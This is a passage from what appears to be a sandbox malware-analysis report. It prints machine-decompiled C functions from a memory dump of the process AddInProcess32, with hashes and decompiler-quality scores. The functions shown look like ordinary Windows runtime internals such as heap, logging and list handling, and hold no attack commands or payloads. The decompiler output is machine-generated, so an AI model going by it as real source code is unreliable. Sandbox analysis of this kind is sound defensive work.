                              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                              					do {
                              						asm("lock xadd [0x19460f0], ax");
                              						 *((short*)(_t41 + 0x34)) = 1;
                              					} while (1 == 0);
                              					goto L8;
                              				} else {
                              					_t41 = L01874620(0x1946100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                              					if(_t41 == 0) {
                              						L11:
                              						asm("lock dec dword [0x1946100]");
                              						L8:
                              						return _t41;
                              					}
                              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                              					if(_t41 == 0) {
                              						goto L11;
                              					}
                              					goto L6;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 124bc796cff754b28b51f85ad2ad287d79c311d9b7ed3bc7199c3caa939a90ff
                              • Instruction ID: 43a91cb8fab9771cab93bc684fc0763fe8f77101f590158366d78d72743c3166
                              • Opcode Fuzzy Hash: 124bc796cff754b28b51f85ad2ad287d79c311d9b7ed3bc7199c3caa939a90ff
                              • Instruction Fuzzy Hash: 063122B6604606EBDB21EF5CC4C0BA673B4FF59314F040078ED48DB206EB74DA068B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E01859100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                              				signed int _t53;
                              				signed int _t56;
                              				signed int* _t60;
                              				signed int _t63;
                              				signed int _t66;
                              				signed int _t69;
                              				void* _t70;
                              				intOrPtr* _t72;
                              				void* _t78;
                              				void* _t79;
                              				signed int _t80;
                              				intOrPtr _t82;
                              				void* _t85;
                              				void* _t88;
                              				void* _t89;
                              
                              				_t84 = __esi;
                              				_t70 = __ecx;
                              				_t68 = __ebx;
                              				_push(0x2c);
                              				_push(0x192f6e8);
                              				E018AD0E8(__ebx, __edi, __esi);
                              				 *((char*)(_t85 - 0x1d)) = 0;
                              				_t82 =  *((intOrPtr*)(_t85 + 8));
                              				if(_t82 == 0) {
                              					L4:
                              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                              						E019288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                              					}
                              					L5:
                              					return E018AD130(_t68, _t82, _t84);
                              				}
                              				_t88 = _t82 -  *0x19486c0; // 0x12e07b0
                              				if(_t88 == 0) {
                              					goto L4;
                              				}
                              				_t89 = _t82 -  *0x19486b8; // 0x0
                              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					goto L4;
                              				} else {
                              					E01872280(_t82 + 0xe0, _t82 + 0xe0);
                              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                              					__eflags =  *((char*)(_t82 + 0xe5));
                              					if(__eflags != 0) {
                              						E019288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                              						goto L12;
                              					} else {
                              						__eflags =  *((char*)(_t82 + 0xe4));
                              						if( *((char*)(_t82 + 0xe4)) == 0) {
                              							 *((char*)(_t82 + 0xe4)) = 1;
                              							_push(_t82);
                              							_push( *((intOrPtr*)(_t82 + 0x24)));
                              							E0189AFD0();
                              						}
                              						while(1) {
                              							_t60 = _t82 + 8;
                              							 *(_t85 - 0x2c) = _t60;
                              							_t68 =  *_t60;
                              							_t80 = _t60[1];
                              							 *(_t85 - 0x28) = _t68;
                              							 *(_t85 - 0x24) = _t80;
                              							while(1) {
                              								L10:
                              								__eflags = _t80;
                              								if(_t80 == 0) {
                              									break;
                              								}
                              								_t84 = _t68;
                              								 *(_t85 - 0x30) = _t80;
                              								 *(_t85 - 0x24) = _t80 - 1;
                              								asm("lock cmpxchg8b [edi]");
                              								_t68 = _t84;
                              								 *(_t85 - 0x28) = _t68;
                              								 *(_t85 - 0x24) = _t80;
                              								__eflags = _t68 - _t84;
                              								_t82 =  *((intOrPtr*)(_t85 + 8));
                              								if(_t68 != _t84) {
                              									continue;
                              								}
                              								__eflags = _t80 -  *(_t85 - 0x30);
                              								if(_t80 !=  *(_t85 - 0x30)) {
                              									continue;
                              								}
                              								__eflags = _t80;
                              								if(_t80 == 0) {
                              									break;
                              								}
                              								_t63 = 0;
                              								 *(_t85 - 0x34) = 0;
                              								_t84 = 0;
                              								__eflags = 0;
                              								while(1) {
                              									 *(_t85 - 0x3c) = _t84;
                              									__eflags = _t84 - 3;
                              									if(_t84 >= 3) {
                              										break;
                              									}
                              									__eflags = _t63;
                              									if(_t63 != 0) {
                              										L40:
                              										_t84 =  *_t63;
                              										__eflags = _t84;
                              										if(_t84 != 0) {
                              											_t84 =  *(_t84 + 4);
                              											__eflags = _t84;
                              											if(_t84 != 0) {
                              												 *0x194b1e0(_t63, _t82);
                              												 *_t84();
                              											}
                              										}
                              										do {
                              											_t60 = _t82 + 8;
                              											 *(_t85 - 0x2c) = _t60;
                              											_t68 =  *_t60;
                              											_t80 = _t60[1];
                              											 *(_t85 - 0x28) = _t68;
                              											 *(_t85 - 0x24) = _t80;
                              											goto L10;
                              										} while (_t63 == 0);
                              										goto L40;
                              									}
                              									_t69 = 0;
                              									__eflags = 0;
                              									while(1) {
                              										 *(_t85 - 0x38) = _t69;
                              										__eflags = _t69 -  *0x19484c0;
                              										if(_t69 >=  *0x19484c0) {
                              											break;
                              										}
                              										__eflags = _t63;
                              										if(_t63 != 0) {
                              											break;
                              										}
                              										_t66 = E01929063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                              										__eflags = _t66;
                              										if(_t66 == 0) {
                              											_t63 = 0;
                              											__eflags = 0;
                              										} else {
                              											_t63 = _t66 + 0xfffffff4;
                              										}
                              										 *(_t85 - 0x34) = _t63;
                              										_t69 = _t69 + 1;
                              									}
                              									_t84 = _t84 + 1;
                              								}
                              								__eflags = _t63;
                              							}
                              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                              							 *((char*)(_t82 + 0xe5)) = 1;
                              							 *((char*)(_t85 - 0x1d)) = 1;
                              							L12:
                              							 *(_t85 - 4) = 0xfffffffe;
                              							E0185922A(_t82);
                              							_t53 = E01877D50();
                              							__eflags = _t53;
                              							if(_t53 != 0) {
                              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              							} else {
                              								_t56 = 0x7ffe0386;
                              							}
                              							__eflags =  *_t56;
                              							if( *_t56 != 0) {
                              								_t56 = E01928B58(_t82);
                              							}
                              							__eflags =  *((char*)(_t85 - 0x1d));
                              							if( *((char*)(_t85 - 0x1d)) != 0) {
                              								__eflags = _t82 -  *0x19486c0; // 0x12e07b0
                              								if(__eflags != 0) {
                              									__eflags = _t82 -  *0x19486b8; // 0x0
                              									if(__eflags == 0) {
                              										_t79 = 0x19486bc;
                              										_t72 = 0x19486b8;
                              										goto L18;
                              									}
                              									__eflags = _t56 | 0xffffffff;
                              									asm("lock xadd [edi], eax");
                              									if(__eflags == 0) {
                              										E01859240(_t68, _t82, _t82, _t84, __eflags);
                              									}
                              								} else {
                              									_t79 = 0x19486c4;
                              									_t72 = 0x19486c0;
                              									L18:
                              									E01889B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                              								}
                              							}
                              							goto L5;
                              						}
                              					}
                              				}
                              			}


















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8195678506a28aa8d1c982b00bb57b7e853a4690abc4b323e8a045311d3ef556
                              • Instruction ID: 5eaeadaf9a5b216dbca105da2b98d6a591436647e9c6b03adc9f4530f280f696
                              • Opcode Fuzzy Hash: 8195678506a28aa8d1c982b00bb57b7e853a4690abc4b323e8a045311d3ef556
                              • Instruction Fuzzy Hash: B631C775D41A55DFDBA1DBACC088BACBBF1FB44358F18815DC818E7241C338AA40C752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E01881DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr* _v20;
                              				void* _t22;
                              				char _t23;
                              				void* _t36;
                              				intOrPtr _t42;
                              				intOrPtr _t43;
                              
                              				_v12 = __ecx;
                              				_t43 = 0;
                              				_v20 = __edx;
                              				_t42 =  *__edx;
                              				 *__edx = 0;
                              				_v16 = _t42;
                              				_push( &_v8);
                              				_push(0);
                              				_push(0);
                              				_push(6);
                              				_push(0);
                              				_push(__ecx);
                              				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                              				_push(_t36);
                              				_t22 = E0187F460();
                              				if(_t22 < 0) {
                              					if(_t22 == 0xc0000023) {
                              						goto L1;
                              					}
                              					L3:
                              					return _t43;
                              				}
                              				L1:
                              				_t23 = _v8;
                              				if(_t23 != 0) {
                              					_t38 = _a4;
                              					if(_t23 >  *_a4) {
                              						_t42 = L01874620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                              						if(_t42 == 0) {
                              							goto L3;
                              						}
                              						_t23 = _v8;
                              					}
                              					_push( &_v8);
                              					_push(_t23);
                              					_push(_t42);
                              					_push(6);
                              					_push(_t43);
                              					_push(_v12);
                              					_push(_t36);
                              					if(E0187F460() < 0) {
                              						if(_t42 != 0 && _t42 != _v16) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                              						}
                              						goto L3;
                              					}
                              					 *_v20 = _t42;
                              					 *_a4 = _v8;
                              				}
                              				_t43 = 1;
                              				goto L3;
                              			}












                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                              • Instruction ID: cee9ce2ed4496019d22755bc55f808b215b014c9d026363fa03ea72291b6a043
                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                              • Instruction Fuzzy Hash: 18217F72600119EFD721DF59CC88EAABBB9FF85B54F114055EA05D7250DA34EF02C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E018D6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                              				signed short* _v8;
                              				signed char _v12;
                              				void* _t22;
                              				signed char* _t23;
                              				intOrPtr _t24;
                              				signed short* _t44;
                              				void* _t47;
                              				signed char* _t56;
                              				signed char* _t58;
                              
                              				_t48 = __ecx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t44 = __ecx;
                              				_v12 = __edx;
                              				_v8 = __ecx;
                              				_t22 = E01877D50();
                              				_t58 = 0x7ffe0384;
                              				if(_t22 == 0) {
                              					_t23 = 0x7ffe0384;
                              				} else {
                              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              				}
                              				if( *_t23 != 0) {
                              					_t24 =  *0x1947b9c; // 0x0
                              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                              					_t23 = L01874620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                              					_t56 = _t23;
                              					if(_t56 != 0) {
                              						_t56[0x24] = _a4;
                              						_t56[0x28] = _a8;
                              						_t56[6] = 0x1420;
                              						_t56[0x20] = _v12;
                              						_t14 =  &(_t56[0x2c]); // 0x2c
                              						E0189F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                              						if(E01877D50() != 0) {
                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              						}
                              						_push(_t56);
                              						_push(_t47 - 0x20);
                              						_push(0x402);
                              						_push( *_t58 & 0x000000ff);
                              						E01899AE0();
                              						_t23 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                              					}
                              				}
                              				return _t23;
                              			}












                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f858f2a845746ba1f8cf52d8b84730464d8d210f551c8928a4122fe19eace8fb
                              • Instruction ID: fae8120454439acb8270e6000d10c58398199f801d8b6569ec7e35dfa672ca07
                              • Opcode Fuzzy Hash: f858f2a845746ba1f8cf52d8b84730464d8d210f551c8928a4122fe19eace8fb
                              • Instruction Fuzzy Hash: DA218BB1A00649AFD715DB6CD884E6ABBB8FF48744F140069F904D7791E634EE50CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E018990AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                              				intOrPtr* _v0;
                              				void* _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				char _v36;
                              				void* _t38;
                              				intOrPtr _t41;
                              				void* _t44;
                              				signed int _t45;
                              				intOrPtr* _t49;
                              				signed int _t57;
                              				signed int _t58;
                              				intOrPtr* _t59;
                              				void* _t62;
                              				void* _t63;
                              				void* _t65;
                              				void* _t66;
                              				signed int _t69;
                              				intOrPtr* _t70;
                              				void* _t71;
                              				intOrPtr* _t72;
                              				intOrPtr* _t73;
                              				char _t74;
                              
                              				_t65 = __edx;
                              				_t57 = _a4;
                              				_t32 = __ecx;
                              				_v8 = __edx;
                              				_t3 = _t32 + 0x14c; // 0x14c
                              				_t70 = _t3;
                              				_v16 = __ecx;
                              				_t72 =  *_t70;
                              				while(_t72 != _t70) {
                              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                              						L24:
                              						_t72 =  *_t72;
                              						continue;
                              					}
                              					_t30 = _t72 + 0x10; // 0x10
                              					if(E018AD4F0(_t30, _t65, _t57) == _t57) {
                              						return 0xb7;
                              					}
                              					_t65 = _v8;
                              					goto L24;
                              				}
                              				_t61 = _t57;
                              				_push( &_v12);
                              				_t66 = 0x10;
                              				if(E0188E5E0(_t57, _t66) < 0) {
                              					return 0x216;
                              				}
                              				_t73 = L01874620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                              				if(_t73 == 0) {
                              					_t38 = 0xe;
                              					return _t38;
                              				}
                              				_t9 = _t73 + 0x10; // 0x10
                              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                              				E0189F3E0(_t9, _v8, _t57);
                              				_t41 =  *_t70;
                              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                              					_t62 = 3;
                              					asm("int 0x29");
                              					_push(_t62);
                              					_push(_t57);
                              					_push(_t73);
                              					_push(_t70);
                              					_t71 = _t62;
                              					_t74 = 0;
                              					_v36 = 0;
                              					_t63 = E0188A2F0(_t62, _t71, 1, 6,  &_v36);
                              					if(_t63 == 0) {
                              						L20:
                              						_t44 = 0x57;
                              						return _t44;
                              					}
                              					_t45 = _v12;
                              					_t58 = 0x1c;
                              					if(_t45 < _t58) {
                              						goto L20;
                              					}
                              					_t69 = _t45 / _t58;
                              					if(_t69 == 0) {
                              						L19:
                              						return 0xe8;
                              					}
                              					_t59 = _v0;
                              					do {
                              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                              							goto L18;
                              						}
                              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                              						 *_t59 = _t49;
                              						if( *_t49 != 0x53445352) {
                              							goto L18;
                              						}
                              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                              						return 0;
                              						L18:
                              						_t63 = _t63 + 0x1c;
                              						_t74 = _t74 + 1;
                              					} while (_t74 < _t69);
                              					goto L19;
                              				}
                              				 *_t73 = _t41;
                              				 *((intOrPtr*)(_t73 + 4)) = _t70;
                              				 *((intOrPtr*)(_t41 + 4)) = _t73;
                              				 *_t70 = _t73;
                              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                              				return 0;
                              			}



























                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                              • Instruction ID: 2a92fbf8a4be7cc91be06faf2683c17ed7be17b2fa8497005e000b662f8692fd
                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                              • Instruction Fuzzy Hash: C62171B1A00709EFDB21DF59C885A6ABBF8EF54314F14846EE949D7211D334EE408B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E01883B7A(void* __ecx) {
                              				signed int _v8;
                              				char _v12;
                              				intOrPtr _v20;
                              				intOrPtr _t17;
                              				intOrPtr _t26;
                              				void* _t35;
                              				void* _t38;
                              				void* _t41;
                              				intOrPtr _t44;
                              
                              				_t17 =  *0x19484c4; // 0x0
                              				_v12 = 1;
                              				_v8 =  *0x19484c0 * 0x4c;
                              				_t41 = __ecx;
                              				_t35 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x19484c0 * 0x4c);
                              				if(_t35 == 0) {
                              					_t44 = 0xc0000017;
                              				} else {
                              					_push( &_v8);
                              					_push(_v8);
                              					_push(_t35);
                              					_push(4);
                              					_push( &_v12);
                              					_push(0x6b);
                              					_t44 = E0189AA90();
                              					_v20 = _t44;
                              					if(_t44 >= 0) {
                              						E0189FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x19484c0 * 0xc);
                              						_t38 = _t35;
                              						if(_t35 < _v8 + _t35) {
                              							do {
                              								asm("movsd");
                              								asm("movsd");
                              								asm("movsd");
                              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                              							} while (_t38 < _v8 + _t35);
                              							_t44 = _v20;
                              						}
                              					}
                              					_t26 =  *0x19484c4; // 0x0
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                              				}
                              				return _t44;
                              			}













                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e9b3bc90d422a9610b52a7d18a01c1f1686ba410fee3910d784e8bec9b9c2b97
                              • Instruction ID: 50dda1982353a7a631cb39c941f05c2866a6a59c735af10fa18aa2ada1dd75dd
                              • Opcode Fuzzy Hash: e9b3bc90d422a9610b52a7d18a01c1f1686ba410fee3910d784e8bec9b9c2b97
                              • Instruction Fuzzy Hash: 50218072600109AFD715EF98CD81F5ABBBDFB44B48F150068EA04EB251D371EE01DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E018D6CF0(void* __edx, intOrPtr _a4, short _a8) {
                              				char _v8;
                              				char _v12;
                              				char _v16;
                              				char _v20;
                              				char _v28;
                              				char _v36;
                              				char _v52;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed char* _t21;
                              				void* _t24;
                              				void* _t36;
                              				void* _t38;
                              				void* _t46;
                              
                              				_push(_t36);
                              				_t46 = __edx;
                              				_v12 = 0;
                              				_v8 = 0;
                              				_v20 = 0;
                              				_v16 = 0;
                              				if(E01877D50() == 0) {
                              					_t21 = 0x7ffe0384;
                              				} else {
                              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                              				}
                              				if( *_t21 != 0) {
                              					_t21 =  *[fs:0x30];
                              					if((_t21[0x240] & 0x00000004) != 0) {
                              						if(E01877D50() == 0) {
                              							_t21 = 0x7ffe0385;
                              						} else {
                              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                              						}
                              						if(( *_t21 & 0x00000020) != 0) {
                              							_t56 = _t46;
                              							if(_t46 == 0) {
                              								_t46 = 0x1835c80;
                              							}
                              							_push(_t46);
                              							_push( &_v12);
                              							_t24 = E0188F6E0(_t36, 0, _t46, _t56);
                              							_push(_a4);
                              							_t38 = _t24;
                              							_push( &_v28);
                              							_t21 = E0188F6E0(_t38, 0, _t46, _t56);
                              							if(_t38 != 0) {
                              								if(_t21 != 0) {
                              									E018D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                              									L01872400( &_v52);
                              								}
                              								_t21 = L01872400( &_v28);
                              							}
                              						}
                              					}
                              				}
                              				return _t21;
                              			}




















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 33a908e5fde82a4bb19ef66bdcd1c69910a89b3fb7f77fab5798354d6fcaa848
                              • Instruction ID: c4a7891f63ea3c7311cbb3e1e2945686483262c3a1a8d26c89f108035687eb2a
                              • Opcode Fuzzy Hash: 33a908e5fde82a4bb19ef66bdcd1c69910a89b3fb7f77fab5798354d6fcaa848
                              • Instruction Fuzzy Hash: FB2100324003499BD721EF2CD944B6BBBECEF91384F180556FA40C7250E735CB48C6A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E0192070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                              				char _v8;
                              				intOrPtr _v11;
                              				signed int _v12;
                              				intOrPtr _v15;
                              				signed int _v16;
                              				intOrPtr _v28;
                              				void* __ebx;
                              				char* _t32;
                              				signed int* _t38;
                              				signed int _t60;
                              
                              				_t38 = __ecx;
                              				_v16 = __edx;
                              				_t60 = E019207DF(__ecx, __edx,  &_a4,  &_a8, 2);
                              				if(_t60 != 0) {
                              					_t7 = _t38 + 0x38; // 0x29cd5903
                              					_push( *_t7);
                              					_t9 = _t38 + 0x34; // 0x6adeeb00
                              					_push( *_t9);
                              					_v12 = _a8 << 0xc;
                              					_t11 = _t38 + 4; // 0x5de58b5b
                              					_push(0x4000);
                              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                              					E0191AFDE( &_v8,  &_v12);
                              					E01921293(_t38, _v28, _t60);
                              					if(E01877D50() == 0) {
                              						_t32 = 0x7ffe0380;
                              					} else {
                              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              						_t21 = _t38 + 0x3c; // 0xc3595e5f
                              						E019114FB(_t38,  *_t21, _v11, _v15, 0xd);
                              					}
                              				}
                              				return  ~_t60;
                              			}














                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                              • Instruction ID: 9ab446f4cf570c3770c000c6589093a51e20ffa256de6128d30ee335dbfab758
                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                              • Instruction Fuzzy Hash: 5C21F236204214AFD705DF2CCC84A6ABBA9EBD4750F088569F9998B389D730D909CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E018D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				intOrPtr _t21;
                              				void* _t24;
                              				intOrPtr _t25;
                              				void* _t36;
                              				short _t39;
                              				signed char* _t42;
                              				unsigned int _t46;
                              				void* _t50;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t21 =  *0x1947b9c; // 0x0
                              				_t46 = _a8;
                              				_v12 = __edx;
                              				_v8 = __ecx;
                              				_t4 = _t46 + 0x2e; // 0x2e
                              				_t36 = _t4;
                              				_t24 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                              				_t50 = _t24;
                              				if(_t50 != 0) {
                              					_t25 = _a4;
                              					if(_t25 == 5) {
                              						L3:
                              						_t39 = 0x14b1;
                              					} else {
                              						_t39 = 0x14b0;
                              						if(_t25 == 6) {
                              							goto L3;
                              						}
                              					}
                              					 *((short*)(_t50 + 6)) = _t39;
                              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                              					_t11 = _t50 + 0x2c; // 0x2c
                              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                              					E0189F3E0(_t11, _a12, _t46);
                              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                              					if(E01877D50() == 0) {
                              						_t42 = 0x7ffe0384;
                              					} else {
                              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					}
                              					_push(_t50);
                              					_t19 = _t36 - 0x20; // 0xe
                              					_push(0x403);
                              					_push( *_t42 & 0x000000ff);
                              					E01899AE0();
                              					_t24 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                              				}
                              				return _t24;
                              			}














                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f88aa4725b3013a64ef3e0d2fd04be8348a195d178ab9ac6e2f18e06d88b5ff1
                              • Instruction ID: cf58ce8c1f37f9069f8277263fc4750ca7453fc53b0fc279f163cf69c40fcf7b
                              • Opcode Fuzzy Hash: f88aa4725b3013a64ef3e0d2fd04be8348a195d178ab9ac6e2f18e06d88b5ff1
                              • Instruction Fuzzy Hash: 4921AE72900644AFC725DFA9D880E6BBBA8EF48340F10056DF60AC7750E634EA00CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E0187AE73(intOrPtr __ecx, void* __edx) {
                              				intOrPtr _v8;
                              				void* _t19;
                              				char* _t22;
                              				signed char* _t24;
                              				intOrPtr _t25;
                              				intOrPtr _t27;
                              				void* _t31;
